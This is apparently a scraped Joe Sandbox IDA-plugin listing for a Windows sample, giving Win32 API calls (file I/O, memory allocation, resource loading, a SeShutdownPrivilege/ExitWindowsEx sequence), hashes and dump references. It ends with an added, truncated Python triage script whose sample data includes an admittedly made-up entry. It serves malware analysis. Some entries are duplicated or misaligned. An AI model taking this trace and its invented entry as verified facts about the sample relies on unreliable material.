Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
  • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
  • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
  • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
  • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
• String ID:
• API String ID: 296031713-0
• Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
• Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: single block 406fa0-406ff3 (SetErrorMode, call 403414, LoadLibraryA); rendered graph not reproduced (legend: Executed / Not Executed)
APIs
• SetErrorMode.KERNEL32(00008000), ref: 00406FAA
• LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
• Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
• GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
• Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
• Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
• Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
• Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
  • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
• Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
• Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
• Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetEndOfFile.KERNEL32(?,02018000,0040AA59,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                            • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                                            • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                            • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 107509674-3733053543
                                                                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                            • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                                            • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                            • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

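The two API chains just above (SeShutdownPrivilege enabled via OpenProcessToken/LookupPrivilegeValueA/AdjustTokenPrivileges and then ExitWindowsEx(2, 0) at 00409457; FindResourceA/SizeofResource/LoadResource/LockResource at 00409C3E) and the VirtualAlloc/VirtualFree entries earlier in this listing are the kind of thing an analyst triages by reading the argument values. The Python script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in the shape this listing uses and flags the three patterns. The EWX_*, RT_* and PAGE_EXECUTE_READWRITE tables are the documented Win32 values; SAMPLE is constructed from the entries above (with some argument lists shortened) plus one made-up VirtualAlloc line at ref 00401234 so the RWX rule has something to fire on; the rule set and the "first ref as function key" convention are my own.

```python
import re
from typing import Dict, List, Optional

# One "• Api.MODULE(args), ref: addr" line of a Joe Sandbox function listing.
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented Win32 constants: ExitWindowsEx flags, resource types, page protection.
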